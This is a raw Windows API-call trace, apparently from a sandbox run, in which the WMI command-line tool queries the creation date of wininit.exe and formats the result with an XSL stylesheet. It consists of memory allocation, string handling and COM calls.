[0565.775] malloc (_Size=0x18) returned 0x189580
[0565.775] malloc (_Size=0x8) returned 0x187fa0
[0565.775] memmove_s (in: _Destination=0x187fa0, _DestinationSize=0x8, _Source=0x186690, _SourceSize=0x8 | out: _Destination=0x187fa0) returned 0x0
[0565.775] malloc (_Size=0x18) returned 0x1896e0
[0565.776] malloc (_Size=0x20) returned 0x18ceb0
[0565.776] memcpy_s (in: _Destination=0x18ceb0, _DestinationSize=0x1e, _Source=0x31ee28, _SourceSize=0x14 | out: _Destination=0x18ceb0) returned 0x0
[0565.776] lstrlenW (lpString="&") returned 1
[0565.776] lstrlenW (lpString="&amp;") returned 5
[0565.776] lstrlenW (lpString="<") returned 1
[0565.776] lstrlenW (lpString="&lt;") returned 4
[0565.776] lstrlenW (lpString=">") returned 1
[0565.776] lstrlenW (lpString="&gt;") returned 4
[0565.776] lstrlenW (lpString="'") returned 1
[0565.776] lstrlenW (lpString="&apos;") returned 6
[0565.776] lstrlenW (lpString="\"") returned 1
[0565.776] lstrlenW (lpString="&quot;") returned 6
[0565.776] malloc (_Size=0x18) returned 0x189680
[0565.776] free (_Block=0x1896e0)
[0565.777] free (_Block=0x18ceb0)
[0565.777] ?Format@CHString@@QEAAXPEBGZZ () returned 0x18da4c
[0565.777] malloc (_Size=0x18) returned 0x1896e0
[0565.777] malloc (_Size=0x18) returned 0x189720
[0565.777] SysStringLen (param_1="") returned 0xa
[0565.777] SysStringLen (param_1="Q9IATRKPRH") returned 0x17
[0565.777] memcpy (in: _Dst=0x2d6ed8, _Src=0x36c0e8, _Size=0x16 | out: _Dst=0x2d6ed8) returned 0x2d6ed8
[0565.777] memcpy (in: _Dst=0x2d6eec, _Src=0x2fa038, _Size=0x30 | out: _Dst=0x2d6eec) returned 0x2d6eec
[0565.777] free (_Block=0x189580)
[0565.777] free (_Block=0x1896e0)
[0565.777] malloc (_Size=0x18) returned 0x1896e0
[0565.778] malloc (_Size=0x18) returned 0x189580
[0565.778] SysStringLen (param_1="Q9IATRKPRH") returned 0x21
[0565.778] SysStringLen (param_1="") returned 0xb
[0565.778] memcpy (in: _Dst=0x313818, _Src=0x2d6ed8, _Size=0x44 | out: _Dst=0x313818) returned 0x313818
[0565.778] memcpy (in: _Dst=0x31385a, _Src=0x31ee28, _Size=0x18 | out: _Dst=0x31385a) returned 0x31385a
[0565.778] free (_Block=0x189720)
[0565.778] free (_Block=0x1896e0)
[0565.778] free (_Block=0x189680)
[0565.778] free (_Block=0x187fa0)
[0565.778] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0565.778] malloc (_Size=0x18) returned 0x189680
[0565.778] SysStringLen (param_1="") returned 0x17
[0565.778] SysStringLen (param_1="Q9IATRKPRH") returned 0x2c
[0565.779] memcpy (in: _Dst=0x2eef38, _Src=0x2fa628, _Size=0x30 | out: _Dst=0x2eef38) returned 0x2eef38
[0565.779] memcpy (in: _Dst=0x2eef66, _Src=0x313818, _Size=0x5a | out: _Dst=0x2eef66) returned 0x2eef66
[0565.779] free (_Block=0x1895a0)
[0565.779] lstrlenW (lpString="LIST") returned 4
[0565.779] lstrlenW (lpString="get") returned 3
[0565.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0565.779] malloc (_Size=0x18) returned 0x1895a0
[0565.779] malloc (_Size=0x18) returned 0x1896e0
[0565.779] SysStringLen (param_1="Q9IATRKPRH") returned 0x43
[0565.779] SysStringLen (param_1="") returned 0x18
[0565.779] memcpy (in: _Dst=0x2ef008, _Src=0x2eef38, _Size=0x88 | out: _Dst=0x2ef008) returned 0x2ef008
[0565.779] memcpy (in: _Dst=0x2ef08e, _Src=0x2fa038, _Size=0x32 | out: _Dst=0x2ef08e) returned 0x2ef08e
[0565.779] free (_Block=0x189680)
[0565.780] free (_Block=0x1895a0)
[0565.780] free (_Block=0x189580)
[0565.780] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0565.780] malloc (_Size=0x18) returned 0x189580
[0565.780] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate ") returned 0x62
[0565.780] SysStringLen (param_1="Q9IATRKPRH") returned 0x5b
[0565.780] memcpy (in: _Dst=0x36b408, _Src=0x36a2a8, _Size=0xc6 | out: _Dst=0x36b408) returned 0x36b408
[0565.780] memcpy (in: _Dst=0x36b4cc, _Src=0x2ef008, _Size=0xb8 | out: _Dst=0x36b4cc) returned 0x36b4cc
[0565.780] free (_Block=0x189760)
[0565.780] ??0CHString@@QEAA@XZ () returned 0xaf5d0
[0565.780] malloc (_Size=0x18) returned 0x189760
[0565.780] malloc (_Size=0x18) returned 0x1895a0
[0565.780] malloc (_Size=0x18) returned 0x189680
[0565.781] malloc (_Size=0x18) returned 0x189720
[0565.781] malloc (_Size=0x18) returned 0x189780
[0565.781] malloc (_Size=0x18) returned 0x189640
[0565.781] malloc (_Size=0x18) returned 0x1897a0
[0565.781] malloc (_Size=0x18) returned 0x18da70
[0565.781] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0xc | out: _Destination=0xaf4d0) returned 0x0
[0565.781] lstrlenW (lpString="&") returned 1
[0565.781] lstrlenW (lpString="&amp;") returned 5
[0565.781] lstrlenW (lpString="<") returned 1
[0565.781] lstrlenW (lpString="&lt;") returned 4
[0565.781] lstrlenW (lpString=">") returned 1
[0565.781] lstrlenW (lpString="&gt;") returned 4
[0565.781] lstrlenW (lpString="'") returned 1
[0565.781] lstrlenW (lpString="&apos;") returned 6
[0565.781] lstrlenW (lpString="\"") returned 1
[0565.781] lstrlenW (lpString="&quot;") returned 6
[0565.782] malloc (_Size=0x18) returned 0x18da90
[0565.782] free (_Block=0x18da70)
[0565.782] malloc (_Size=0x18) returned 0x18da70
[0565.782] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0xc | out: _Destination=0xaf4d0) returned 0x0
[0565.782] lstrlenW (lpString="&") returned 1
[0565.782] lstrlenW (lpString="&amp;") returned 5
[0565.782] lstrlenW (lpString="<") returned 1
[0565.782] lstrlenW (lpString="&lt;") returned 4
[0565.782] lstrlenW (lpString=">") returned 1
[0565.782] lstrlenW (lpString="&gt;") returned 4
[0565.782] lstrlenW (lpString="'") returned 1
[0565.782] lstrlenW (lpString="&apos;") returned 6
[0565.782] lstrlenW (lpString="\"") returned 1
[0565.782] lstrlenW (lpString="&quot;") returned 6
[0565.782] malloc (_Size=0x18) returned 0x18dab0
[0565.783] free (_Block=0x18da70)
[0565.783] malloc (_Size=0x18) returned 0x18da70
[0565.783] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0x6 | out: _Destination=0xaf4d0) returned 0x0
[0565.783] lstrlenW (lpString="&") returned 1
[0565.783] lstrlenW (lpString="&amp;") returned 5
[0565.783] lstrlenW (lpString="<") returned 1
[0565.783] lstrlenW (lpString="&lt;") returned 4
[0565.783] lstrlenW (lpString=">") returned 1
[0565.783] lstrlenW (lpString="&gt;") returned 4
[0565.783] lstrlenW (lpString="'") returned 1
[0565.783] lstrlenW (lpString="&apos;") returned 6
[0565.783] lstrlenW (lpString="\"") returned 1
[0565.783] lstrlenW (lpString="&quot;") returned 6
[0565.783] malloc (_Size=0x18) returned 0x18dad0
[0565.784] free (_Block=0x18da70)
[0565.784] malloc (_Size=0x18) returned 0x18da70
[0565.784] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0x6 | out: _Destination=0xaf4d0) returned 0x0
[0565.784] lstrlenW (lpString="&") returned 1
[0565.784] lstrlenW (lpString="&amp;") returned 5
[0565.784] lstrlenW (lpString="<") returned 1
[0565.784] lstrlenW (lpString="&lt;") returned 4
[0565.784] lstrlenW (lpString=">") returned 1
[0565.784] lstrlenW (lpString="&gt;") returned 4
[0565.784] lstrlenW (lpString="'") returned 1
[0565.784] lstrlenW (lpString="&apos;") returned 6
[0565.784] lstrlenW (lpString="\"") returned 1
[0565.784] lstrlenW (lpString="&quot;") returned 6
[0565.784] malloc (_Size=0x18) returned 0x18daf0
[0565.785] free (_Block=0x18da70)
[0565.785] malloc (_Size=0x18) returned 0x18da70
[0565.785] malloc (_Size=0x20) returned 0x18ceb0
[0565.785] memcpy_s (in: _Destination=0x18ceb0, _DestinationSize=0x1e, _Source=0x36c118, _SourceSize=0x14 | out: _Destination=0x18ceb0) returned 0x0
[0565.785] lstrlenW (lpString="&") returned 1
[0565.785] lstrlenW (lpString="&amp;") returned 5
[0565.785] lstrlenW (lpString="<") returned 1
[0565.785] lstrlenW (lpString="&lt;") returned 4
[0565.785] lstrlenW (lpString=">") returned 1
[0565.785] lstrlenW (lpString="&gt;") returned 4
[0565.785] lstrlenW (lpString="'") returned 1
[0565.785] lstrlenW (lpString="&apos;") returned 6
[0565.785] lstrlenW (lpString="\"") returned 1
[0565.785] lstrlenW (lpString="&quot;") returned 6
[0565.785] malloc (_Size=0x18) returned 0x18db10
[0565.786] free (_Block=0x18da70)
[0565.786] free (_Block=0x18ceb0)
[0565.786] malloc (_Size=0x18) returned 0x18da70
[0565.786] malloc (_Size=0x20) returned 0x18ceb0
[0565.786] memcpy_s (in: _Destination=0x18ceb0, _DestinationSize=0x1e, _Source=0x36c118, _SourceSize=0x10 | out: _Destination=0x18ceb0) returned 0x0
[0565.786] lstrlenW (lpString="&") returned 1
[0565.786] lstrlenW (lpString="&amp;") returned 5
[0565.786] lstrlenW (lpString="<") returned 1
[0565.787] lstrlenW (lpString="&lt;") returned 4
[0565.787] lstrlenW (lpString=">") returned 1
[0565.787] lstrlenW (lpString="&gt;") returned 4
[0565.787] lstrlenW (lpString="'") returned 1
[0565.787] lstrlenW (lpString="&apos;") returned 6
[0565.787] lstrlenW (lpString="\"") returned 1
[0565.787] lstrlenW (lpString="&quot;") returned 6
[0565.787] malloc (_Size=0x18) returned 0x18db30
[0565.787] free (_Block=0x18da70)
[0565.787] free (_Block=0x18ceb0)
[0565.788] malloc (_Size=0x18) returned 0x18da70
[0565.788] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0xc | out: _Destination=0xaf4d0) returned 0x0
[0565.788] lstrlenW (lpString="&") returned 1
[0565.788] lstrlenW (lpString="&amp;") returned 5
[0565.788] lstrlenW (lpString="<") returned 1
[0565.788] lstrlenW (lpString="&lt;") returned 4
[0565.788] lstrlenW (lpString=">") returned 1
[0565.788] lstrlenW (lpString="&gt;") returned 4
[0565.788] lstrlenW (lpString="'") returned 1
[0565.788] lstrlenW (lpString="&apos;") returned 6
[0565.788] lstrlenW (lpString="\"") returned 1
[0565.788] lstrlenW (lpString="&quot;") returned 6
[0565.788] malloc (_Size=0x18) returned 0x18db50
[0565.789] free (_Block=0x18da70)
[0565.789] ?Format@CHString@@QEAAXPEBGZZ () returned 0x37dfdc
[0565.790] malloc (_Size=0x18) returned 0x18da70
[0565.790] ??1CHString@@QEAA@XZ () returned 0x6601
[0565.790] free (_Block=0x18db50)
[0565.790] free (_Block=0x18db30)
[0565.790] free (_Block=0x18db10)
[0565.790] free (_Block=0x1897a0)
[0565.790] free (_Block=0x18daf0)
[0565.790] free (_Block=0x18da90)
[0565.791] free (_Block=0x18dab0)
[0565.791] free (_Block=0x189640)
[0565.791] free (_Block=0x189780)
[0565.791] free (_Block=0x18dad0)
[0565.791] free (_Block=0x189720)
[0565.791] free (_Block=0x189680)
[0565.791] free (_Block=0x189760)
[0565.791] free (_Block=0x1895a0)
[0565.791] malloc (_Size=0x18) returned 0x1895a0
[0565.791] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRH") returned 0xbd
[0565.791] SysStringLen (param_1="root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x173
[0565.791] memcpy (in: _Dst=0x369798, _Src=0x36b408, _Size=0x17c | out: _Dst=0x369798) returned 0x369798
[0565.791] memcpy (in: _Dst=0x369912, _Src=0x36b5a8, _Size=0x2e8 | out: _Dst=0x369912) returned 0x369912
[0565.792] free (_Block=0x189580)
[0565.792] malloc (_Size=0x18) returned 0x189580
[0565.792] malloc (_Size=0x18) returned 0x189760
[0565.792] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x230
[0565.792] SysStringLen (param_1="") returned 0xa
[0565.792] memcpy (in: _Dst=0x36c948, _Src=0x369798, _Size=0x462 | out: _Dst=0x36c948) returned 0x36c948
[0565.792] memcpy (in: _Dst=0x36cda8, _Src=0x36c118, _Size=0x16 | out: _Dst=0x36cda8) returned 0x36cda8
[0565.792] free (_Block=0x1895a0)
[0565.792] free (_Block=0x189580)
[0565.792] free (_Block=0x189740)
[0565.792] free (_Block=0x1896e0)
[0565.792] free (_Block=0x18da70)
[0565.793] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0565.793] malloc (_Size=0x18) returned 0x1896e0
[0565.793] SysStringLen (param_1="") returned 0x0
[0565.793] SysStringLen (param_1="") returned 0x60
[0565.793] memcpy (in: _Dst=0x36a2a8, _Src=0x2a0ac8, _Size=0x2 | out: _Dst=0x36a2a8) returned 0x36a2a8
[0565.793] memcpy (in: _Dst=0x36a2a8, _Src=0x348718, _Size=0xc2 | out: _Dst=0x36a2a8) returned 0x36a2a8
[0565.793] free (_Block=0x189040)
[0565.793] malloc (_Size=0x18) returned 0x189040
[0565.793] SysStringLen (param_1="") returned 0x60
[0565.793] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x23a
[0565.793] memcpy (in: _Dst=0x36cdd8, _Src=0x36a2a8, _Size=0xc2 | out: _Dst=0x36cdd8) returned 0x36cdd8
[0565.793] memcpy (in: _Dst=0x36ce98, _Src=0x36c948, _Size=0x476 | out: _Dst=0x36ce98) returned 0x36ce98
[0565.793] free (_Block=0x1896e0)
[0565.793] WbemLocator:IUnknown:Release (This=0x308a30) returned 0x0
[0565.794] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0565.794] malloc (_Size=0x18) returned 0x1896e0
[0565.795] SysStringLen (param_1="") returned 0x0
[0565.795] SysStringLen (param_1="20240603113412.436800+120") returned 0xc0
[0565.795] memcpy (in: _Dst=0x369798, _Src=0x2f1c88, _Size=0x2 | out: _Dst=0x369798) returned 0x369798
[0565.795] memcpy (in: _Dst=0x369798, _Src=0x36a108, _Size=0x182 | out: _Dst=0x369798) returned 0x369798
[0565.795] free (_Block=0x189560)
[0565.795] _kbhit () returned 0x0
[0565.798] malloc (_Size=0x18) returned 0x189560
[0565.798] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x29a
[0565.798] SysStringLen (param_1="20240603113412.436800+120") returned 0xc0
[0565.798] memcpy (in: _Dst=0x36d328, _Src=0x36cdd8, _Size=0x536 | out: _Dst=0x36d328) returned 0x36d328
[0565.798] memcpy (in: _Dst=0x36d85c, _Src=0x369798, _Size=0x182 | out: _Dst=0x36d85c) returned 0x36d85c
[0565.799] free (_Block=0x189040)
[0565.799] malloc (_Size=0x18) returned 0x189040
[0565.799] malloc (_Size=0x18) returned 0x189740
[0565.799] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON20240603113412.436800+120") returned 0x35a
[0565.799] SysStringLen (param_1="") returned 0xa
[0565.799] memcpy (in: _Dst=0x36d9f8, _Src=0x36d328, _Size=0x6b6 | out: _Dst=0x36d9f8) returned 0x36d9f8
[0565.799] memcpy (in: _Dst=0x36e0ac, _Src=0x36c118, _Size=0x16 | out: _Dst=0x36e0ac) returned 0x36e0ac
[0565.799] free (_Block=0x189560)
[0565.799] free (_Block=0x189040)
[0565.799] GetCurrentThreadId () returned 0x440
[0565.799] ??0CHString@@QEAA@PEBG@Z () returned 0xaf6c8
[0565.799] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xaf6c8
[0565.800] lstrlenW (lpString="LIST") returned 4
[0565.800] lstrlenW (lpString="get") returned 3
[0565.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0565.800] lstrlenW (lpString="ASSOC") returned 5
[0565.800] lstrlenW (lpString="get") returned 3
[0565.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3
[0565.800] lstrlenW (lpString="GET") returned 3
[0565.800] lstrlenW (lpString="get") returned 3
[0565.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0565.800] malloc (_Size=0x20a) returned 0x18d710
[0565.800] GetSystemDirectoryW (in: lpBuffer=0x18d710, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0565.801] free (_Block=0x18d710)
[0565.801] malloc (_Size=0x18) returned 0x189040
[0565.801] malloc (_Size=0x18) returned 0x189560
[0565.801] malloc (_Size=0x18) returned 0x189580
[0565.801] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0565.801] SysStringLen (param_1="\\wbem\\") returned 0x6
[0565.801] memcpy (in: _Dst=0x2fa628, _Src=0x2fa038, _Size=0x28 | out: _Dst=0x2fa628) returned 0x2fa628
[0565.801] memcpy (in: _Dst=0x2fa64e, _Src=0x36c118, _Size=0xe | out: _Dst=0x2fa64e) returned 0x2fa64e
[0565.801] free (_Block=0x189040)
[0565.802] free (_Block=0x189560)
[0565.802] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0565.802] free (_Block=0x189580)
[0565.802] malloc (_Size=0x18) returned 0x189580
[0565.802] malloc (_Size=0x18) returned 0x189560
[0565.802] malloc (_Size=0x18) returned 0x189040
[0565.802] malloc (_Size=0x18) returned 0x1895a0
[0565.802] malloc (_Size=0x18) returned 0x189680
[0565.802] malloc (_Size=0x18) returned 0x189720
[0565.803] lstrlenW (lpString="TABLE") returned 5
[0565.803] lstrlenW (lpString="CSV") returned 3
[0565.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1
[0565.803] lstrlenW (lpString="TABLE") returned 5
[0565.803] lstrlenW (lpString="HFORM") returned 5
[0565.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 1
[0565.803] lstrlenW (lpString="TABLE") returned 5
[0565.803] lstrlenW (lpString="HTABLE") returned 6
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] lstrlenW (lpString="LIST") returned 4
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="TABLE", cchCount2=5) returned 1
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] lstrlenW (lpString="MOF") returned 3
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] lstrlenW (lpString="RAWXML") returned 6
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 2
[0565.804] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.804] SysStringLen (param_1="hform.xsl") returned 0x9
[0565.804] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.805] SysStringLen (param_1="htable.xsl") returned 0xa
[0565.805] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.805] SysStringLen (param_1="csv.xsl") returned 0x7
[0565.805] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.805] SysStringLen (param_1="mof.xsl") returned 0x7
[0565.805] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.805] SysStringLen (param_1="xml.xsl") returned 0x7
[0565.805] malloc (_Size=0x18) returned 0x189780
[0565.805] malloc (_Size=0x18) returned 0x189640
[0565.805] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0565.805] SysStringLen (param_1="\\") returned 0x1
[0565.805] memcpy (in: _Dst=0x2fa628, _Src=0x2fa038, _Size=0x34 | out: _Dst=0x2fa628) returned 0x2fa628
[0565.805] memcpy (in: _Dst=0x2fa65a, _Src=0x36c178, _Size=0x4 | out: _Dst=0x2fa65a) returned 0x2fa65a
[0565.805] free (_Block=0x189780)
[0565.805] malloc (_Size=0x18) returned 0x189780
[0565.806] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\\\") returned 0x1a
[0565.806] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.806] memcpy (in: _Dst=0x2ef008, _Src=0x2fa628, _Size=0x36 | out: _Dst=0x2ef008) returned 0x2ef008
[0565.806] memcpy (in: _Dst=0x2ef03c, _Src=0x2866c8, _Size=0x1c | out: _Dst=0x2ef03c) returned 0x2ef03c
[0565.806] free (_Block=0x189640)
[0565.806] CreateFileW (lpFileName="C:\\Windows\\system32\\wbem\\\\texttable.xsl" (normalized: "c:\\windows\\system32\\wbem\\texttable.xsl"), dwDesiredAccess=0x0, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x294
[0565.868] CloseHandle (hObject=0x294) returned 1
[0565.868] malloc (_Size=0x30) returned 0x1886c0
[0565.868] malloc (_Size=0x30) returned 0x188700
[0565.869] ??0CHString@@QEAA@PEBG@Z () returned 0xaf428
[0565.869] ?Right@CHString@@QEBA?AV1@H@Z () returned 0xaf420
[0565.869] ??0CHString@@QEAA@PEBG@Z () returned 0xaf478
[0565.869] _wcsicmp (_String1=".xsl", _String2=".xsl") returned 0
[0565.869] ??1CHString@@QEAA@XZ () returned 0x1
[0565.869] ??1CHString@@QEAA@XZ () returned 0x20015f007c0001
[0565.869] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0565.869] malloc (_Size=0x30) returned 0x188740
[0565.869] malloc (_Size=0x20) returned 0x18ceb0
[0565.869] malloc (_Size=0x30) returned 0x188780
[0565.870] free (_Block=0x188740)
[0565.870] free (_Block=0x188700)
[0565.870] free (_Block=0x1886c0)
[0565.871] free (_Block=0x189720)
[0565.871] free (_Block=0x189680)
[0565.871] free (_Block=0x1895a0)
[0565.871] free (_Block=0x189040)
[0565.871] free (_Block=0x189560)
[0565.871] free (_Block=0x189580)
[0565.871] GetCurrentThreadId () returned 0x440
[0565.871] ??0CHString@@QEAA@XZ () returned 0xaf4d0
[0565.871] CoCreateInstance (in: rclsid=0xffa67410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xffad29e8 | out: ppv=0xffad29e8*=0x1fd71d0) returned 0x0
[0565.874] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x1fd71d0, bstrXML=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON20240603113412.436800+120", isSuccessful=0xaf4b4 | out: isSuccessful=0xaf4b4*=0xffff) returned 0x0
[0565.880] ??0CHString@@QEAA@XZ () returned 0xaf1b0
[0565.880] GetCurrentThreadId () returned 0x440
[0565.880] malloc (_Size=0x20) returned 0x18cee0
[0565.880] malloc (_Size=0x30) returned 0x1886c0
[0565.880] CoCreateInstance (in: rclsid=0xffa67420*(Data1=0x2933bf94, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xffa67400*(Data1=0x2933bf93, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xaf1c8 | out: ppv=0xaf1c8*=0x1fd7620) returned 0x0
[0565.895] CoCreateInstance (in: rclsid=0xffa67410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xffa673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xaf1e0 | out: ppv=0xaf1e0*=0x1fdb330) returned 0x0
[0565.896] FreeThreadedDOMDocument:IXMLDOMDocument:put_async (This=0x1fdb330, async=0) returned 0x0
[0565.896] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\\\texttable.xsl") returned 0x4e
[0565.897] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1fdb330, xmlSource=0xaf380*(varType=0x8, wReserved1=0x1fd, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\\\texttable.xsl", varVal2=0x0), isSuccessful=0xaf478 | out: isSuccessful=0xaf478*=0xffff) returned 0x0
[0565.969] XSLTemplate:IXSLTemplate:putref_stylesheet (This=0x1fd7620, stylesheet=0x1fdb330) returned 0x0
[0566.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xacfc0 | out: lpSystemTimeAsFileTime=0xacfc0*(dwLowDateTime=0x6b9b1bd0, dwHighDateTime=0x1dab599))
[0566.060] GetCurrentProcessId () returned 0x520
[0566.060] GetCurrentThreadId () returned 0x440
[0566.060] GetTickCount () returned 0x25d75
[0566.060] QueryPerformanceCounter (in: lpPerformanceCount=0xacfc8 | out: lpPerformanceCount=0xacfc8*=2095910652077) returned 1
[0566.061] malloc (_Size=0x100) returned 0x18aa10
[0566.062] __dllonexit () returned 0x7fef58cbfc0
[0566.062] __dllonexit () returned 0x7fef58cbfa8
[0566.063] __dllonexit () returned 0x7fef58cbfd4
[0566.068] GetUserDefaultLCID () returned 0x409
[0566.069] GetVersion () returned 0x1db10106
[0566.073] ??2@YAPEAX_K@Z () returned 0x18d710
[0566.074] ??2@YAPEAX_K@Z () returned 0x18e240
[0566.075] GetUserDefaultLCID () returned 0x409
[0566.075] GetACP () returned 0x4e4
[0566.075] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.078] GetCurrentThreadId () returned 0x440
[0566.078] ??2@YAPEAX_K@Z () returned 0x18d710
[0566.078] GetCurrentThreadId () returned 0x440
[0566.079] ??2@YAPEAX_K@Z () returned 0x18cf10
[0566.079] ??2@YAPEAX_K@Z () returned 0x188700
[0566.079] ??2@YAPEAX_K@Z () returned 0x18d7f0
[0566.079] ??2@YAPEAX_K@Z () returned 0x188740
[0566.079] GetCurrentThreadId () returned 0x440
[0566.079] ??2@YAPEAX_K@Z () returned 0x18d8c0
[0566.079] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0566.080] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xaecd0, cchData=6 | out: lpLCData="1252") returned 5
[0566.080] IsValidCodePage (CodePage=0x4e4) returned 1
[0566.081] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feff780000
[0566.082] GetProcAddress (hModule=0x7feff780000, lpProcName="CoCreateInstance") returned 0x7feff7a7490
[0566.082] CoCreateInstance (in: rclsid=0x7fef591d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef591d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x18e588 | out: ppv=0x18e588*=0x30b4e0) returned 0x0
[0566.082] IUnknown:AddRef (This=0x30b4e0) returned 0x2
